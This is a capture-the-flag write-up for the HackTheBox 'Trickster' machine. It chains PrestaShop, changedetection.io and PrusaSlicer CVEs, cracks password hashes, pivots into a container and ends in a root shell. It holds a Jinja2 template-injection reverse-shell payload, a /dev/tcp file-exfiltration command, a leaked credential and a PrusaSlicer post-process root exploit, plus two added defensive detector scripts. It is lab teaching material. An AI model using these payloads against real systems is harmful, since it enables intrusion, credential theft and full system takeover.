
HackTheBox Trickster Writeup

Explore the fundamentals of cybersecurity in the Trickster Capture The Flag (CTF) challenge, a medium-level experience, ideal for those seeking to advance their skills! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it a great stepping stone for those familiar with basic security techniques looking to tackle more complex scenarios.

Add Hosts

Edit the /etc/hosts file and add the following entries:

10.10.11.34 trickster.htb shop.trickster.htb

Script to add hosts automatically

ip="10.10.11.34";domain="trickster.htb shop.trickster.htb"
sudo grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV trickster.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-21 21:16 CEST
Nmap scan report for trickster.htb (10.10.11.34)
Host is up (0.059s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2024-34716 (PrestaShop)

git clone https://github.com/aelmokhtar/CVE-2024-34716
cd CVE-2024-34716
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
python3 exploit.py --url 'http://shop.trickster.htb' --email 'adam@trickster.htb' --local-ip $vpnip --admin-path 'admin634ewutrx1gitlooaj'

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm;

Find Database Credentials

timeout 1 find /var/www -type f -name "*.php" -exec grep -Hn 'database_' {} \; 2>/dev/null

Use the found credentials to access the MySQL database:

mysql -h 127.0.0.1 -u <user> -p

Inside MySQL:

USE prestashop;
SELECT id_employee, email, passwd FROM ps_employee;

Brute Force the Hash

Use a hash cracking tool such as hashcat or John the Ripper to run a dictionary attack against the password hash, or submit it to a service such as CrackStation. PrestaShop employee passwords are bcrypt hashes, which is hashcat mode 3200:

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 3200 /tmp/hash.txt --show
rm -rf /tmp/hash.txt

SSH Access

After cracking the password, use it to SSH:

ssh james@trickster.htb

Ping Sweep for Active Hosts

You may discover a container at 172.17.0.1 by checking network interfaces. Perform a ping sweep to identify active hosts:

subnet="172.17"
(
for i in {0..255}; do
  for j in {1..254}; do
    ip="$subnet.$i.$j"
    (ping -c 1 -W 1 $ip >/dev/null 2>&1 && echo "Host $ip is up") &
  done
done
wait
)

You should find 172.17.0.2.

Scan Ports of 172.17.0.2

Scan the ports:

nc -zv 172.17.0.2 1-65535 2>&1 | grep succeeded

If nc isn’t available, use the bash alternative:

(
for port in {1..65535}; do
 (echo > /dev/tcp/172.17.0.2/$port) >/dev/null 2>&1 && echo "Port $port is open" &
done
)

Port 5000 is open.

Forward Port 5000 for Local Access

ssh -L 5000:172.17.0.2:5000 james@trickster.htb

CVE-2024-32651 (changedetection.io Exploit)

Log in to changedetection.io (now reachable on http://127.0.0.1:5000 through the SSH tunnel) using James' credentials.

Host a Python HTTP server:

python -m http.server

Set up a listener for the reverse shell:

nc -lvnp 9001

Replace vpn-ip in the watch URL and in the notification body below with your actual VPN IP so the target can reach both the HTTP server and the listener.

Create a new “watch” on http://vpn-ip:8000. In the notification settings:

Notification URL:

gets://

Notification Body:


{% for x in ().__class__.__base__.__subclasses__() %}
  {% if "warning" in x.__name__ %}
    {{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"vpn-ip\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}
  {% endif %}
{% endfor %}

To trigger the watch, create a file in the HTTP server:

touch file

Visit the changedetection.io main page and manually retrigger the watcher by clicking the recheck option; the notification body is rendered as a Jinja2 template when the change is detected, which is what executes the payload.
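The notification body above is a Jinja2 sandbox escape: it walks __class__, __base__ and __subclasses__ to reach a class whose module exposes __builtins__, then imports os. Those dunder walks are exactly what a defender can key on when validating user-supplied template strings. The following is an added example, not code from this writeup or from the changedetection.io project: a stdlib-only linter that scans every template tag in a notification body and reports dunder attribute access and interpreter- or OS-level names. The two sample bodies are constructed here; the second mirrors the structure of the payload above but only runs id.

```python
import re

# Tags a Jinja2 engine would evaluate: {{ expression }} and {% statement %}.
TAG_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)

# Dunder attribute access, either as .__name__ or as ['__name__'] subscripts.
DUNDER_RE = re.compile(r"(?:\.|\[\s*['\"])__[a-zA-Z]+__")

# Names that reach the interpreter's builtins or the operating system
# from inside a template; none of them belong in a notification body.
SUSPECT_NAMES = ("__subclasses__", "__builtins__", "__import__",
                 "__globals__", "popen", "system", "subprocess")


def find_template_risks(body: str) -> list:
    """Return (tag, reason) pairs for each template tag in `body` that
    walks dunder attributes or names an interpreter/OS-level function.
    An empty list means no tag tripped either check."""
    findings = []
    for tag in TAG_RE.findall(body):
        reasons = []
        if DUNDER_RE.search(tag):
            reasons.append("dunder attribute access")
        hits = [name for name in SUSPECT_NAMES if name in tag]
        if hits:
            reasons.append("references " + ", ".join(hits))
        if reasons:
            findings.append((tag.strip(), "; ".join(reasons)))
    return findings


# Constructed sample bodies (not taken from a real instance).
BENIGN_BODY = "Page {{ watch_url }} changed at {{ current_snapshot }}"
ESCAPE_BODY = (
    "{% for x in ().__class__.__base__.__subclasses__() %}\n"
    "  {% if 'warning' in x.__name__ %}\n"
    "    {{ x()._module.__builtins__['__import__']('os').popen('id').read() }}\n"
    "  {% endif %}\n"
    "{% endfor %}"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("escape", ESCAPE_BODY)):
        findings = find_template_risks(body)
        print(f"{label}: {len(findings)} risky tag(s)")
        for tag, reason in findings:
            print(f"  {reason}: {tag}")
```

A regex pass like this is a cheap pre-filter for logging and alerting; the stronger fix is to render untrusted bodies with jinja2.sandbox.SandboxedEnvironment, which refuses dunder attribute access at evaluation time instead of relying on pattern matching.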

PrivEsc

To retrieve a backup file from the target, set up a listener on your local machine using nc. This will allow you to receive the file when it’s sent from the target.

nc -lvnp 4445 > changedetection-bak.zip

On the target machine, use the following command to send the backup file to your local machine through the open listener.

cat /datastore/Backups/changedetection-backup-20240830194841.zip > /dev/tcp/vpn-ip/4445

After receiving the file, close the listener and extract the contents of the zip file. Use brotli to decompress any .br files you find and then read their contents.

unzip changedetection-bak.zip
brotli -d b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt.br
cat ./b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt

Within the extracted file, you will find the credentials for the user adam:

adam:adam_admin992

To gain access to the target, log in as adam:

su adam

Next, check the sudo privileges available to the adam user to see what commands can be executed with elevated permissions.

sudo -l

You should see output indicating that adam can run PrusaSlicer with elevated privileges without needing to provide a password:

User adam may run the following commands on trickster:
(ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer

This means you can exploit the application by running sudo /opt/PrusaSlicer/prusaslicer without needing a password.

CVE-2023-47268 (PrusaSlicer)

https://www.exploit-db.com/exploits/51983

PrusaSlicer honours a post_process setting embedded in the project's Metadata/Slic3r_PE.config and runs it as a shell command after slicing. Because the binary runs as root via sudo, that command runs as root too. Copy the .3mf down with scp, set post_process to chmod u+s /bin/bash, repack the archive, and upload it back to the target:

scp adam@trickster.htb:/opt/PrusaSlicer/TRICKSTER.3mf Trickster.3mf
unzip Trickster.3mf Metadata/Slic3r_PE.config -d ./tmp
sed -i 's/^.*post_process.*/; post_process = "chmod u+s \/bin\/bash"/' ./tmp/Metadata/Slic3r_PE.config
sed -i 's/^.*output_filename_format.*/; output_filename_format = exploit.gcode/' ./tmp/Metadata/Slic3r_PE.config
cd ./tmp
zip -r -Z deflate ../Trickster.3mf ./*
cd ..
rm -rf ./tmp
scp Trickster.3mf adam@trickster.htb:/tmp/
rm -rf Trickster.3mf

On the target machine, execute PrusaSlicer with the modified file:

sudo /opt/PrusaSlicer/prusaslicer -s /tmp/Trickster.3mf
bash -p
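The weak link here is the sudo rule, not PrusaSlicer itself: any project file fed to a slicer that runs as root must be treated as a script. An administrator who cannot remove the NOPASSWD entry can at least inspect files before they are sliced. The following is an added example, not part of this writeup or of the PrusaSlicer project: it opens a .3mf (a zip archive), parses the "; key = value" lines of Metadata/Slic3r_PE.config and reports the post_process and output_filename_format values, treating any non-empty post_process as unsafe for a privileged run. The sample .3mf files are constructed in a temporary directory by the block itself.

```python
import os
import tempfile
import zipfile

# Location of the embedded slicer config inside a PrusaSlicer .3mf archive.
CONFIG_MEMBER = "Metadata/Slic3r_PE.config"

# Keys whose values name external commands or output paths; these are the
# ones that matter when the slicer runs with elevated privileges.
WATCHED_KEYS = ("post_process", "output_filename_format")


def parse_slicer_config(text: str) -> dict:
    """Parse the '; key = value' lines of a Slic3r_PE.config into a dict.
    Lines without '=' (plain comments) are ignored; quotes around values are stripped."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith(";"):
            continue
        body = line[1:].strip()
        if "=" not in body:
            continue
        key, _, value = body.partition("=")
        cfg[key.strip()] = value.strip().strip('"')
    return cfg


def audit_3mf(path: str) -> dict:
    """Return the watched keys and their values from the .3mf at `path`.
    An empty dict means the archive carries no slicer config at all."""
    with zipfile.ZipFile(path) as zf:
        if CONFIG_MEMBER not in zf.namelist():
            return {}
        cfg = parse_slicer_config(zf.read(CONFIG_MEMBER).decode("utf-8", "replace"))
    return {key: cfg.get(key, "") for key in WATCHED_KEYS}


def is_safe_for_privileged_run(path: str) -> bool:
    """True only when the project asks the slicer to run no post-processing command."""
    return audit_3mf(path).get("post_process", "") == ""


def build_sample_3mf(post_process: str) -> str:
    """Write a constructed, minimal .3mf to a temp file and return its path.
    The config mirrors the layout PrusaSlicer uses but is a sample, not a real export."""
    config = (
        "; generated by PrusaSlicer (constructed sample)\n"
        "; layer_height = 0.2\n"
        f'; post_process = "{post_process}"\n'
        "; output_filename_format = [input_filename_base].gcode\n"
    )
    fd, path = tempfile.mkstemp(suffix=".3mf")
    os.close(fd)
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("3D/3dmodel.model", "<model/>")
        zf.writestr(CONFIG_MEMBER, config)
    return path


if __name__ == "__main__":
    # Hypothetical hook path, used only to show a non-empty post_process.
    for label, hook in (("clean", ""), ("hooked", "/usr/local/bin/after-slice.sh")):
        sample = build_sample_3mf(hook)
        report = audit_3mf(sample)
        verdict = "safe" if is_safe_for_privileged_run(sample) else "UNSAFE"
        print(f"{label}: {verdict} {report}")
        os.unlink(sample)
```

The check is deliberately strict: it does not try to judge whether a post_process command looks harmless, because under sudo any command is a root shell. The same parser can be pointed at the original TRICKSTER.3mf to confirm it shipped without a hook before the box was exploited.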

At this point, you should have elevated privileges and can access sensitive files such as /root/root.txt.

cat /root/root.txt

This post is licensed under CC BY 4.0 by the author.